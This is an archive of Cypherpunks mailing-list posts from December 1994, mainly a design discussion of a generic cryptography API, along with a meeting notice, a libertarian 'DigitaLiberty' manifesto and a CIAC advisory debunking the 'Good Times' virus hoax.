As a developer though, I panic when I see "generic" API's. Usually, they are not as "black-box" as people would like to believe. What I mean is, usually they are not just as simple as "put in this input, and you will get this output." Also, are we talking about C code or C++ code? DOS? Windows? Are we talking multi-platform code that will work on all the major OS's? For a generic API, that's a lot of code...I keep saying that....must mean something.

I would be interested in seeing something like this implemented, but I question whether it will be a hit as an industry standard. Generic API's really haven't gone over well for things in the past. (Except the class libraries for major C++ compilers. MFC, OWL, etc.) The design has to be robust before you start coding.

Anyone else have any comments?

Brad

>>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<<
Brad Shantz                          bshantz at spry.com
Software Engineer                    SPRY Inc.
Direct #: (206)-442-8251             316 Occidental Ave. S.
Main #: (206)-447-0300               Suite 316
Fax #: (206)-447-9008                Seattle, WA 98104
WWW URL: http://WWW.SPRY.COM
----------------------------------------------------------------------
PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

From ianf at sydney.sgi.com Tue Dec 6 13:51:57 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 6 Dec 94 13:51:57 PST
Subject: Dec. 10th Bay Area Cypherpunks Meeting
In-Reply-To: <199412060628.WAA07448@syzygy.com>
Message-ID: <9412070836.ZM4161@wiley.sydney.sgi.com>

On Dec 5, 10:28pm, KT Kislitzin wrote:
> This month's Bay Area Cypherpunks Meeting will be held this Saturday,
> December 10th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris
> (same cypher time, same cypher channel...).
>
> The topic for this month's discussions is:
>
> Technical Cryptography
>
> We have three speakers planned. [...]

There isn't a chance that this could either be taped or broadcast, is there? This sounds like it will be a fascinating meeting, and deserves a wider audience.

Ian.

From sleas at d.umn.edu Tue Dec 6 14:08:01 1994
From: sleas at d.umn.edu (shawn leas)
Date: Tue, 6 Dec 94 14:08:01 PST
Subject: core dumps with pgp-elm
Message-ID: <199412062205.QAA17119@ub.d.umn.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Anybody else get this problem?? I've tried all sorts of different things. Compiles fine, runs fine w/out pgp options, but crashes like a stone when I use them. Segmentation violation. That sucks!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLuTgGaZRyOzqm29xAQHIsgP9Hw2Wq84gOZ3sCx0qzVQAYY9JimC1/avD
6YMFEL3cRv0KhVeFV1gNKB7DC1wmypstoVTgcy9xiGZdxXvzQ6/dmrqmpWzt2+Fi
GscQMUVHNfi18pX5X+8gjbZpDfD28tc6XW1gPDP5150n1pngTUQ7HXMcqJIxklj3
DmcP3W3+qAo=
=YO8U
-----END PGP SIGNATURE-----

From jya at pipeline.com Tue Dec 6 14:10:39 1994
From: jya at pipeline.com (John Young)
Date: Tue, 6 Dec 94 14:10:39 PST
Subject: MMB question
Message-ID: <199412062215.RAA15048@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Responding to msg by cactus at hks.net ("L. Todd Masco") on Tue, 6 Dec 1:23 PM

>And: are the errata available on-line anywhere? Sounds
>like a very
>worthwhile thing to have.

Applied Cryptography states on the inner flyleaf:

Errata -- A list of the errors found in this book along with corresponding corrections is updated periodically. For the most recent electronic version, send email to:

    schneier at chinet.com

For the most recent printed version, send a stamped, self-addressed envelope to:

    AC Corrections
    Counterpane Systems
    730 Fair Oaks Avenue
    Oak Park, IL 60302

Readers are encouraged to distribute electronic or printed versions of this list to other readers of this book.

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuTiJyoZzwIn1bdtAQGIBAGA2HKGp+3qSsythB5es+QE0lmxrEuc3kKs
zMcBE+OoYdR+yofyFPKBxUGU1Z3w8ZQM
=27st
-----END PGP SIGNATURE-----

From cactus at hks.net Tue Dec 6 14:18:05 1994
From: cactus at hks.net (L. Todd Masco)
Date: Tue, 6 Dec 94 14:18:05 PST
Subject: GUCAPI (Grand Unified Crypto API)
Message-ID: <199412062222.RAA15156@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

bshantz at spry.com writes:
> L.Todd Masco writes:
>
> >I've been thinking a lot recently about how to implement a generic API for
> >crypto such that the interface could be independent of the cipher used.
>
> So, you just want a generic overlay (wrapper) to any of the existing
> encryption algorithms? Is this correct?

More or less. It doesn't need to implement everything straight off: the API itself just has to pass all the information that's necessary.

> >My goal is to come up with an API that could be integrated once into an
> >application and would be flexible enough that new crypto methods, whether
> >ciphers or key management, could be supported entirely by upgrading the
> >library. This includes being flexible enough to cover as diverse
> >methods as OTPs ...
>
> Well, it sounds good in theory. However, trust me, Todd, writing a generic
> API that is multi-platform is not necessarily as easy as it sounds. There's
> a lot of code in this project. You would also have to make sure that the API

Actually, I'm not talking about implementing the library in a multi-platform way. Once the API is specified, people could be found who would do the implementation for any given platform. I'd do a UNIX version that would straight off translate appropriate calls to RSAREF for RSA calls and implement IDEA. A friend of mine is interested in doing the PC version.

> is generic so it could work in ANY program that might use encryption or
> digital signatures. (i.e.
e-mail, USENET news, possibly even lending itself
> to a Secure HTTP implementation.)

Encryption is a pretty straightforward process in the abstract: While such an API might not be well suited to hyper-fast stream methods, it would be Good Enough to have something that could be integrated into mail and news easily.

News and mail are doing the same thing: a big part of the difficulty in getting integrated support is in the cumbersome interface to PGP and the perceived short horizon on PGP changes. If a unified API promised that a crypto API would stay put, I think more people would be hacking code.

I'm not talking about implementing it all at once. In essence, a PGP engine that used these calls would be useful because people could implement MUAs and newsreaders (and perhaps web browsers) that easily integrated PGP encryption by linking with the newest version of the PGP distribution: and then, as newer methods and formats came along, all that would be required would be a relink to support new formats (another function, BTW, would be a guc_parse_format() that would determine the format of the input).

> >(key management would be done on the basis of the method specified.)
>
> Uh, just from a first glance, I'd say that this is going to slip gently into
> the ITAR pits. There are very few "methods" other than RSAREF that you
> could use to make this "universal". Also, would this act as a wrapper
> over PGP, or would it use the same concepts (and or code) to do the same
> things?

Only the spec itself need be exported, no crypto code or even hooks. RSAREF would have to be part of the RSA methods inside the US: outside, it would probably end up being the old PGP code that the current 2.6ui-style PGPs use.

> Agreed, it would be nice to have one API. As a developer though, I
> panic when I see "generic" API's. Usually, they are not as
> "black-box" as people would like to believe.
What I mean is, usually
> they are not just as simple as "put in this input, and you will get
> this output." Also, are we talking about C code or C++ code? DOS?
> Windows? Are we talking multi-platform code that will work on all the
> major OS's? For a generic API, that's a lot of code...I keep saying
> that....must mean something.

Certainly, some APIs are much better than others. The C stdlib, for example, is a pretty good API. Stdio does a very good job of abstracting concepts to calls that work across filesystems as different as VMS's RMS and MS-DOS filesystems.

I'm talking about C -- not every platform supports C++. The OS isn't important: the API can be implemented independently.

> I would be interested in seeing something like this implemented, but I
> question whether it will be a hit as an industry standard. Generic API's
> really haven't gone over well for things in the past. (Except the class
> libraries for major C++ compilers. MFC, OWL, etc.)
> The design has to be robust before you start coding.

Frankly, I don't give a damn about it becoming an "industry standard" if that means Microsoft, Lotus, etc. I have no interest in doing their work for them.

I'm more interested in generating a "net-standard," something that people hacking code for themselves or for freely-distributable packages can use. It's a necessary step along the road to "crypto for the masses."
- --
Todd Masco       | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com  | neither more nor less.'" - Lewis Carroll

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuTkJioZzwIn1bdtAQFEhwF7Bo0K7ZwWDlYtaB46B4kpwOM/jXY0pLrT Q/y84MBu6Z7nwt75X+r0Y93rpBon1QQh =VWmR -----END PGP SIGNATURE----- From lmccarth at bali.cs.umass.edu Tue Dec 6 14:18:46 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Tue, 6 Dec 94 14:18:46 PST Subject: Dec. 10th Bay Area Cypherpunks Meeting Message-ID: <199412062223.RAA15167@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Ian Farquhar writes: > On Dec 5, 10:28pm, KT Kislitzin wrote: > > This month's Bay Area Cypherpunks Meeting will be held this Saturday, > There isn't a chance that this could either be taped or broadcast, is there? It would be really nice if someone could post minutes/notes from this. - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuTh7Gf7YYibNzjpAQF6nQQAu0dzcPgRtte2N1mANQ8vCj/3R4WjJcLb YsjKuJcSG7ZRLE0ERk0EAR9XUPZuOhTWmMAu0BiTOaVmNkhFNARdv/IKxOrOAWU9 1Xqr5RtP4pJabfDWGND6UFtMpLimHMbdMcy8wHmMnm4XykZcQNG3PwMCymtSqQ3L zDEGiahe7ac= =AF6W - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuTkYioZzwIn1bdtAQGl3AGA0N77HqZuchnssElxWGrDygPX4qLb3F1J Cd2dMlY5XYmAKCwyvocol+e5j/oQ3B/M =XLJD -----END PGP SIGNATURE----- From JLICQUIA at mhc.uiuc.edu Tue Dec 6 14:25:05 1994 From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI)) Date: Tue, 6 Dec 94 14:25:05 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > From: "L. Todd Masco" > I've been thinking a lot recently about how to implement a generic API for > crypto such that the interface could be independent of the cipher used. 
Here's a few random thoughts:

Perhaps we could split the functions into groups according to the purpose of the group. Thus, key generation protocols would be in one group, encryption in another, decryption in another, file I/O routines in another, and so on. This would seem to encourage a more modular approach.

It would provide an additional level of abstraction as well; you could implement higher-level actions in terms of lower-level ones. For example, you could implement "PGP-encrypt" in terms of calls to RSA-specific and IDEA-specific functions; from the point of view of the application, however, raw RSA and "PGP-style" encryption would look like two separate implementations of the same API.

It could also facilitate certain other types of apps; for example, if we had a "key management" API and implementations of the API for PGP keys and PEM keys, we could easily construct an app that could PGP-encrypt with PEM keys and vice versa.

Not to be an OO bigot or anything, but I would implement these as object groups, with the parents defining the API and the children implementing it. As an example, consider this "Key" hierarchy:

           Key
          /   \
     PubKey   PrivKey
- ->   /       /   \
   RSAKey  DESKey IDEAKey
    /  \
PGPKey  PEMKey

The arrow indicates the drawing line between definition and implementation classes. Note the common heritage of PGPKey and PEMKey with RSAKey; this could be used as a mechanism for converting between keys if RSAKey were implemented as a "raw" key, while PGPKey and PEMKey could include other key-specific baggage such as userIDs, attached certificates, etc.

Supposedly, then, key management and other stuff could be made specific to the key type, but encrypting and decrypting could consist of a simple:

    Boolean RSAencrypt(char *message, RSAKey &key);

(to use C++ language - substitute your own OOL if desired) and could then use either key format for its dirty work. Of course, this is simplistic, as the encryption engine itself would probably be an object also, etc., etc.
There's some very rough ideas! They're in bad need of clarification; let 'em have it!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLuTj6DER5KvPRd0NAQE2yAP/dqcaHUXa9UrGpGxWOg+8xs2/AhCh0TS6
0Cca76O6Ztc/vzEpBdz1iAMVa/N7DDybwTHR+wgTPjBEKoy1vqMjSPZpEk2Zwhpy
8EgQvGOHInJrMdlWssEZWn8Av1tSaYJtNrtDV2hTEB9pZSzhIi1T257gqjSrnHks
mH3qT0tQTjg=
=AXya
-----END PGP SIGNATURE-----

From bshantz at spry.com Tue Dec 6 14:48:00 1994
From: bshantz at spry.com (bshantz at spry.com)
Date: Tue, 6 Dec 94 14:48:00 PST
Subject: GUCAPI (Grand Unified Crypto API)
Message-ID: <9412062243.AA09569@homer.spry.com>

JEFF LICQUIA (CEI) writes:

>Not to be an OO bigot or anything, but I would implement these as object
>groups, with the parents defining the API and the children implementing
>it. As an example, consider this "Key" hierarchy:

>            Key
>           /   \
>      PubKey   PrivKey
>        /       /   \
>    RSAKey  DESKey IDEAKey
>     /  \
> PGPKey  PEMKey

Great Idea!!! I hadn't pictured it this way. My first impression was completely wrong and I apologize. Now that I understand and have had a few minutes to think about this. It does look pretty good.

Now, about shipping the spec outside the States. Not a problem. We just couldn't ship code or an executable outside the States.

This really is a plausible idea.

Brad

>>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<<
Brad Shantz                    bshantz at spry.com
Senior Software Engineer       SPRY Inc.
Direct #: (206)-442-8251       316 Occidental Ave. S.
Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From root at phantom.com Tue Dec 6 15:02:05 1994 From: root at phantom.com (Operator) Date: Tue, 6 Dec 94 15:02:05 PST Subject: Announcing - The DigitaLiberty Forum Message-ID: <9412062258.AA23412@dockmaster.phantom.com> PLEASE RE-DISTRIBUTE THIS AS YOU SEE FIT Friends of Liberty, It is becoming increasingly apparent that the arrival of cyberspace is destined to engender a fundamental discontinuity in the course of human relations. This is a source of great optimism and opportunity for those of us who believe in freedom. Many of you who participate in the lively debates that take place in these forums have seen a number of activist organizations spring up claiming to represent the cause of freedom. And if you are like me you have cheered these groups on only to watch them get bogged down in a quagmire of realpolitics. It is a sad fact that the beast in Washington has evolved into a self-perpetuating engine expert at co-opting the principles of even the most ardent reformers. Slowly but surely all those who engage the system are ultimately absorbed into the mainstream miasma of majoritarianism. For example, what can be more discouraging than watching an organization that started out as a cyber-civil liberties group shift its focus to creating new forms of government entitlements while endorsing intrusive wiretap legislation because they didn't want to jeopardize their influence and prestige amongst the Washington power elite? Some of us believe we can seek ultimate redress at the polls. 
Many pundits have declared our recent national elections a watershed in politics, a turning point that represents the high water mark of big government. Nonsense. The names have changed, the chairs have been rearranged, but the game remains the same. The so-called "choices" we are presented with are false, hardly better than the mock one-party elections held by failed totalitarian regimes. There must be a better way. I would like to announce the formation of a new group - DigitaLiberty - that has chosen a different path. We intend to bypass the existing political process. We reject consensus building based on the calculus of compromise. Instead we plan to leave the past behind, much as our pioneering forefathers did when they set out to settle new lands. It is our mission to create the basis for a different kind of society. If you would like to join us I invite you to read the information below. Yours in freedom, Bill Frezza Co-founder, DigitaLiberty December 6, 1994 -------------------------------------------------------------------------- *** What is DigitaLiberty? DigitaLiberty is an advocacy group dedicated to the principled defense of freedom in cyberspace. We intend to conduct this defense not by engaging in traditional power politics but by setting an active, persuasive example - creating tangible opportunities for others to join us as we construct new global communities. We believe deeply in free markets and free minds and are convinced that we can construct a domain in which the uncoerced choices of individuals supplant the social compact politics of the tyranny of the majority. *** Is DigitaLiberty a political party or a lobbying group? Neither. DigitaLiberty does not seek to educate or influence politicians in the hope of obtaining legislation favorable to our constituents. We plan to make politicians and legislators irrelevant to the future of network based commerce, education, leisure, and social intercourse. 
DigitaLiberty does not seek to persuade a majority of the electorate to adopt views which can then be forced upon the minority. We hope to make majoritarianism irrelevant. We invite only like minded individuals to help us build the future according to our uncompromised shared values.

*** What do you hope to accomplish?

DigitaLiberty is not hopeful that widespread freedom will come to the physical world, at least not in our lifetime. Too many constituencies depend upon the largess and redistributive power of national governments and therefore oppose freedom and the individual responsibility it entails. But we do believe that liberty can and will prevail in the virtual domains we are building on the net and that national governments will be powerless to stop us. We believe that cyberspace will transcend national borders, national cultures, and national economies. We believe that no one will hold sovereignty over this new realm because coercive force is impotent in cyberspace.

In keeping with the self-organizing nature of on-line societies we believe we will choose to invent new institutions to serve our varied economic and social purposes. DigitaLiberty intends to be in the forefront of the discovery and construction of these institutions.

*** But what about the construction of the "Information Superhighway"?

The fabric of cyberspace is rapidly being built by all manner of entities espousing the full range of political and economic philosophies. While political activity can certainly accelerate or retard the growth of the net in various places and times it cannot stop it nor can it effectively control how the net will be used.

Our focus is not on the institutions that can and will impact the building of the physical "information highway" but on those that will shape life on the net as an ever increasing portion of our productive activities move there.

*** What makes you think cyberspace will be so different?

The United States of America was the only country in history ever to be built upon an idea. Unfortunately, this idea was lost as we slowly traded away our liberties in exchange for the false promise of security.

DigitaLiberty believes that technology can set us free. The economies of the developed world are now making a major transition from an industrial base to an information base. As they do, the science of cryptology will finally and forever guarantee the unbreachable right of privacy, protecting individuals, groups, and corporations from the prying eyes and grasping hands of sovereigns. We will all be free to conduct our lives, and most importantly our economic relations, as we each see fit.

Cyberspace is also infinitely extensible. There will be no brutal competition for lebensraum. Multiple virtual communities can exist side by side and without destructive conflict, each organized according to the principles of their members. We seek only to build one such community, a community based on individual liberty. Others are free to build communities based on other principles, even diametrically opposed principles. But they must do so without our coerced assistance.

Effective communities will thrive and grow. Dysfunctional communities will wither and die. And for the first time in human history, rapacious societies will no longer have the power to make war on their neighbors nor can bankrupt communities take their neighbors down with them.

*** What does this have to do with my real life? I can't eat data. I don't live in a computer.

Yes, but imagine the ultimate impact of mankind's transition from an agrarian economy to an industrial economy to an information economy. Our founding fathers would have considered anyone insane who predicted that a nation of 250 million could feed itself with fewer than 3% of its citizens involved in agriculture.

Similarly, economists and politicians trapped in the policies of the past lament our move from a manufacturing economy to a knowledge worker and service based economy. We see this as a cause to rejoice. The day will come when fewer than 5% of the citizens of a nation of 1 billion will be involved in manufacturing - if we still bother calling geographically defined entities "nations". What will the rest of us be doing?

We will be providing each other with an exploding array of services and we will be creating, consuming, and exchanging information. Most of this will occur entirely within or be mediated at least in part by our activities in cyberspace.

Many of us will earn a very good living on the net. Our race, our religion, our gender, our age, our physical appearance and limitations will all be irrelevant and undetectable. Hard working individuals from underdeveloped nations who in the past might have been forced to emigrate in search of economic freedom and opportunity can now build productive lives in cyberspace. And much if not all of the wealth we create that we do not transform into visible physical assets will be ours to keep and use, beyond the grasp of sovereigns.

*** What is the purpose of this forum?

The DigitaLiberty Forum is a place where like minded individuals can share their views, observations, and strategies related to the development of virtual communities based on freedom. It is a place where people can exchange information and advice about how they have developed extra-territorial business and social relationships - away from the influence and outside the jurisdiction of governments. It is a forum for the posting of essays, questions, and ideas on the topic of liberty. It is a place where we can meet and debate the forms that our new institutions might take and discuss the practical problems and responsibilities that freedom entails.
In time as our technology matures some of us will move on to more ambitious projects, launch other programs, and begin our virtual migration from the swamp of coerced collectivism. Best of all, there will be no need to physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'. We can all participate in this exodus without hastily quitting our jobs or disrupting our lives. And as a larger and larger portion of our economic and social activities move onto the net we will create a new society, open to all with the will to enter. This new world will be interleaved with the physical world in which we now live and yet will be separate. And free. Join us as we begin the journey. *** Who can join DigitaLiberty? The DigitaLiberty Forum is open to anyone that can honestly answer yes to the following two questions: 1) I renounce the use of coercive force as a tool of social or economic policy. 2) I do not derive the majority of my income from funds taken from taxpayers. *** How do I join DigitaLiberty? If you qualify, send a message to DigitaLiberty-request at phantom.com with the words "SUBSCRIBE" in the subject line and the message body as follows SUBSCRIBE DigitaLiberty And welcome to the future. ### From warlord at MIT.EDU Tue Dec 6 15:05:51 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Tue, 6 Dec 94 15:05:51 PST Subject: GUCAPI (Grand Unified Crypto API) In-Reply-To: <199412062119.QAA14522@bb.hks.net> Message-ID: <9412062305.AA04906@yaz-pistachio.MIT.EDU> -----BEGIN PGP SIGNED MESSAGE----- To: "L. Todd Masco" cc: cypherpunks at toad.com Subject: Re: GUCAPI (Grand Unified Crypto API) > I've been thinking a lot recently about how to implement a generic API for > crypto such that the interface could be independent of the cipher used. > What I'm thinking of is something like: Why do all this? 
There already exists a Generic Security System API, GSSAPI, which is an Internet standard (or there is at least an Internet Draft -- I'm not sure what the current status is right now, and given that the IETF is going on this week, its status may change).

Currently, the only GSSAPI bindings I know of are for Kerberos V5 and Kerberos V4, although there could easily be bindings for RSA, PGP, or whatever you want.

I suggest you read up on GSSAPI, which provides much of the functionality that you want, plus a lot more. You would just have to write a PGP binding to get it to work, but that shouldn't be too difficult (I haven't looked at this). It'll be even easier when there is a PGP API.

- -derek

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBuAwUBLuTtwTh0K1zBsGrxAQH72wLEDRSmfcIj4ksSSTEUES48N82ZTLUXFTz3
cF8nCbQVkowjHQKkjeGmRZJV3eDTYVPaAMoDUZ+jIogsg2JnVDJxmseyDWmDPV86
Pgeljv/TbmbAwxAQu7bcbEY=
=2mTL
-----END PGP SIGNATURE-----

From karyn at cheetah.llnl.gov Tue Dec 6 15:26:51 1994
From: karyn at cheetah.llnl.gov (Karyn Pichnarczyk)
Date: Tue, 6 Dec 1994 15:26:51 -0800
Subject: CIAC Notes 94-04
Message-ID: <625d544b2ec4a34567e43939c27c7f16@NO-ID-FOUND.mhonarc.org>

U.S. DOE's Computer Incident Advisory Capability

 ___  __ __    _     ___           __   __ __   __   __
/       |     /_\   /       |\ |  /  \    |    |_   /_
\___  __|__  /   \  \___    | \|  \__/    |    |__  __/

Number 94-04                                             December 6, 1994

------------------- A - T - T - E - N - T - I - O - N -------------------
| CIAC is available 24-hours a day via its two skypage numbers. To use  |
| this service, dial 1-800-759-7243. The PIN numbers are: 8550070 (for  |
| the CIAC duty person) and 8550074 (for the CIAC manager). Please keep |
| these numbers handy.                                                  |
-------------------------------------------------------------------------

Welcome to the fourth issue of CIAC Notes! This is a special edition to clear up recent reports of a "good times" virus-hoax. Let us know if you have topics you would like addressed or have feedback on what is useful and what is not.
Please contact the editor, Allan L. Van Lehn, CIAC, 510-422-8193 or send E-mail to ciac at llnl.gov. $-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$ $ Reference to any specific commercial product does not necessarily $ $ constitute or imply its endorsement, recommendation or favoring by $ $ CIAC, the University of California, or the United States Government.$ $-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$ THE "Good Times" VIRUS IS AN URBAN LEGEND In the early part of December, CIAC started to receive information requests about a supposed "virus" which could be contracted via America OnLine, simply by reading a message. The following is the message that CIAC received: --------------------------------------------------------------------------- | Here is some important information. Beware of a file called Goodtimes. | | | | Happy Chanukah everyone, and be careful out there. There is a virus on | | America Online being sent by E-Mail. If you get anything called "Good | | Times", DON'T read it or download it. It is a virus that will erase your | | hard drive. Forward this to all your friends. It may help them a lot. | --------------------------------------------------------------------------- THIS IS A HOAX. Upon investigation, CIAC has determined that this message originated from both a user of America Online and a student at a university at approximately the same time, and it was meant to be a hoax. CIAC has also seen other variations of this hoax, the main one is that any electronic mail message with the subject line of "xxx-1" will infect your computer. This rumor has been spreading very widely. This spread is due mainly to the fact that many people have seen a message with "Good Times" in the header. They delete the message without reading it, thus believing that they have saved themselves from being attacked. These first-hand reports give a false sense of credibility to the alert message. 
There has been one confirmation of a person who received a message with "xxx-1" in the header, but an empty message body. Then, (in a panic, because he had heard the alert), he checked his PC for viruses (the first time he checked his machine in months) and found a pre-existing virus on his machine. He incorrectly came to the conclusion that the E-mail message gave him the virus (this particular virus could NOT POSSIBLY have spread via an E-mail message). This person then spread his alert. As of this date, there are no known viruses which can infect merely through reading a mail message. For a virus to spread some program must be executed. Reading a mail message does not execute the mail message. Yes, Trojans have been found as executable attachments to mail messages, the most notorious being the IBM VM Christmas Card Trojan of 1987, also the TERM MODULE Worm (reference CIAC Bulletin B-7) and the GAME2 MODULE Worm (CIAC Bulletin B-12). But this is not the case for this particular "virus" alert. If you encounter this message being distributed on any mailing lists, simply ignore it or send a follow-up message stating that this is a false rumor. Karyn Pichnarczyk CIAC Team ciac at llnl.gov ------------------------------ Contacting CIAC If you require additional assistance or wish to report a vulnerability, call CIAC at 510-422-8193, fax messages to 510-423-8002 or send E-mail to ciac at llnl.gov. For emergencies and off-hour assistance, call 1-800-SKY-PAGE (759-7243) and enter PIN number 8550070 (primary) or 8550074 (secondary). The CIAC Duty Officer, a rotating responsibility, carries the primary skypager. The Project Leader carries the secondary skypager. If you are unable to contact CIAC via phone, please use the skypage system. ------------------------------ This document was prepared as an account of work sponsored by an agency of the United States Government. 
Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. ------------------------------ End of CIAC Notes Number 94-04 94_12_06 **************************************** From cactus at hks.net Tue Dec 6 15:43:16 1994 From: cactus at hks.net (L. Todd Masco) Date: Tue, 6 Dec 94 15:43:16 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <199412062348.SAA16082@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Derek Atkins writes: > Why do all this? There already exists a Generic Security System API, > GSSAPI, which is an Internet standard (or there is at least an Internet > Draft -- I'm not sure what the current status is right now, and given > that the IETF is going on this week, it's status may change). Ah, I knew of the GSSAPI's existence but hadn't realized that its scope included what I wanted. I'll read the draft on the internic and see if it does what I want. If so, the next logical step is to wrap RSAREF in it and to make a PGPish-wraparound. I'd certainly be up to the former; Would anybody else be interested in ponying up their time and effort for the PGP instance? 
(The draft is ftpable from ftp.internic.net, /internet-drafts/draft-ietf-cat-gssv2-00.txt) - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuT4LCoZzwIn1bdtAQHh9wF/TyMkm4Cd0gFzk26mdufgytY6NnHfiT3C heS9ACR9d8jwS2pu8/wvF84+sQs0nTEc =bY6Z -----END PGP SIGNATURE----- From maschino at phx.sectel.mot.com Tue Dec 6 15:43:35 1994 From: maschino at phx.sectel.mot.com (Mike Maschino) Date: Tue, 6 Dec 94 15:43:35 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <9412062344.AA14068@ phx.sectel.mot.com> (This is my first attempt at posting, please excuse any errors, and I do not yet have PGP on my employer-owned machine) > I've been thinking a lot recently about how to implement a generic API for > crypto such that the interface could be independent of the cipher used. > What I'm thinking of is something like: There are numerous industry groups working on a "security" API, including Microsoft, Novell, Motorola, Intel, etc. Major focus is transparent (to the user) security (encryption, KCA, signatures, etc) for email, local and remote file access, generalized and integrated telephony, and so forth. Of course, there are many approaches, generation by committee, personal and corporate biases, and other garbage to get in their way. What may be interesting is to look at their proposed security APIs and glean interesting ideas to be incorporated into your API. Some ideas on effective APIs: - the process of encryption/decryption, signaturing, etc should be independent of the destination/source of the data. 
The same API should be able to process a file, an e-mail message, an inter-process control message, etc. The API does not care what the data is from or for, it just operates on it. Of course, the API should be able to process in the various encryption modes, and may have to discriminate between a continuous flow of data and a finite size of data.

- API's at this level must NEVER directly utilize the User Interface (regardless of whether the UI is graphical or textual). It should be completely irrelevant to the API whether it was invoked by an actual user, a local system process, or a remote system process. Return and error conditions are returned to the caller, which then decides what to do with the erroneous result. Error traps are acceptable too, though the trap should allow the "trapper" to decide what to do about notification or handling of the error.

Of course, you recognize the hardest API is key management. Use some data and/or object modeling techniques to handle the two basic scenarios and see if you can generalize it sufficiently.

I have no idea about how to get the group's proposed API's. There has been several mentions in the networking trade papers about them though. Windows 95 and NT WILL have a security API based in part on the existing one worked out with Novell. Of course, security is a local issues as well as a networking or messaging issue, so I doubt their implementation will be thorough.

Hope this is of some help.
- Mike

*****************************************************************************
Mike Maschino                  Email: Mike_Maschino-P17960 at email.mot.com
Motorola                                | "I am not speaking for my employer,
Government and Systems Technology Group | and they do not speak for me"
Scottsdale, AZ, USA                     |
"Neuro-encrypto-psycho-telco-photo-proto-nympho-lego
 -maniacs wanted by same; applications available; god-like entities always welcome"
*****************************************************************************

From M.Gream at uts.EDU.AU Tue Dec 6 16:04:34 1994
From: M.Gream at uts.EDU.AU (Matthew Gream)
Date: Tue, 6 Dec 94 16:04:34 PST
Subject: GUCAPI (Grand Unified Crypto API)
In-Reply-To: <9412062142.AA08621@homer.spry.com>
Message-ID: <199412070002.AB13209@sequoia.itd.uts.EDU.AU>

`bshantz at spry.com' wrote:
>
> Anyone else have any comments?
>

QoS considerations. If the purpose of the API is to allow polymorphic access to cryptographic operations, then you need to provide a method to select `methods' based on particular needs (you're the client, you want the association to meet specific contractual requirements). For example, you may specify key bounds or block sizes. At the same time, you need to reduce the interface's complexity and overhead, which could mean for example that `limited' implementation could do without the QoS aspects; ie. elements need to be clearly separable and orthogonal.

For example, I could envisage:

    resp_t skcs_open (skcs_ctx * ctx, void * name, uint name_sz,
                      uint name_type, bucket * qos, bucket * param);

    resp_t skcs_process (skcs_ctx * ctx, void * iblock, uint iblock_sz,
                         uint * iblock_pos, void * oblock, uint oblock_sz,
